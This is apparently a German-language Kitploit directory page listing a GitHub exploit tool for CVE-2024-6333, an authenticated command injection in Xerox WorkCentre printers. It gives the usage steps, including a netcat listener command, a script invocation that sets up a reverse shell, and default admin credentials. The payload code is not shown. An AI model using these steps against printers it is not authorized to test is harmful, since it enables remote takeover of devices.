Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-6333 — Schwachstelle für authentifizierte Remote-Code-Ausführung in Xerox-WorkCentre-Druckern über die Network-Troubleshooting-Log-Funktion. | Kitploit
Tools/GitHubGitHub/0xqrx/cve-2024-6333
Embedded-System-SicherheitExploitationWebanwendungs-ExploitationPenetrationstestsHardware- & IoT-Sicherheit
GitHub0xqrx/cve-2024-6333

CVE-2024-6333

Schwachstelle für authentifizierte Remote-Code-Ausführung in Xerox-WorkCentre-Druckern über die Network-Troubleshooting-Log-Funktion.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-6333 - Xerox Authentifizierte Remote-Codeausführung

Authentifizierte Remote-Codeausführung in Xerox-WorkCentre-Druckern über die Funktion „Network Troubleshooting Log".

Beschreibung

Die Funktion „Network Troubleshooting Log" (/properties/security/network_troubleshooting_log.php) bereinigt den Zielserver-Parameter (security.nwtroubleshoot.destination.server) nicht ordnungsgemäß, wodurch ein authentifizierter Administrator beliebige Betriebssystembefehle einschleusen kann. Wenn die Netzwerkprotokoll-Erfassung gestartet wird, wird das injizierte Payload als Shell-Befehl ausgeführt, was zu Remote-Codeausführung führt.

Betroffene Produkte

  • XEROX WorkCentre 6655 (getestet mit Firmware 073.110.019.14200)
  • Mehrere andere Xerox-Druckermodelle (siehe Advisory)

Referenzen

  • https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-code-execution-in-multiple-xerox-printers/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-6333

Anforderungen

  • Python 3
  • Gültige Administrator-Anmeldedaten auf dem Zieldrucker
  • Netzwerkzugriff auf das Ziel

Installation

root@kitploit:~
pip install -r requirements.txt

Verwendung

Starten Sie einen Listener auf Ihrem Rechner:

root@kitploit:~
nc -lvnp 8443

Führen Sie den Exploit aus:

root@kitploit:~
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443

Argumente

Funktionsweise

  1. Authentifiziert sich mit den angegebenen Anmeldedaten an der Weboberfläche des Druckers
  2. Beendet vorhandene Sitzungen des Netzwerk-Fehlerbehebungsprotokolls
  3. Injiziert ein Reverse-Shell-Payload in das Zielserver-Feld
  4. Startet die Netzwerkprotokoll-Erfassung und führt dabei das Payload aus
  5. Wartet 30 Sekunden und sendet dann einen Bereinigungs-/Stopp-Befehl

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal.

Tool herunterladen
ArgumentErforderlichStandardBeschreibung
--targetJaZiel-URL (z. B. https://192.0.2.1)
--lhostJaListener-IP-Adresse
--lportNein8443Listener-Port
--userNeinadminAdministrator-Benutzername
--passwordNein1111Administrator-Passwort
--proxyNeinProxy-URL (z. B. http://127.0.0.1:8080)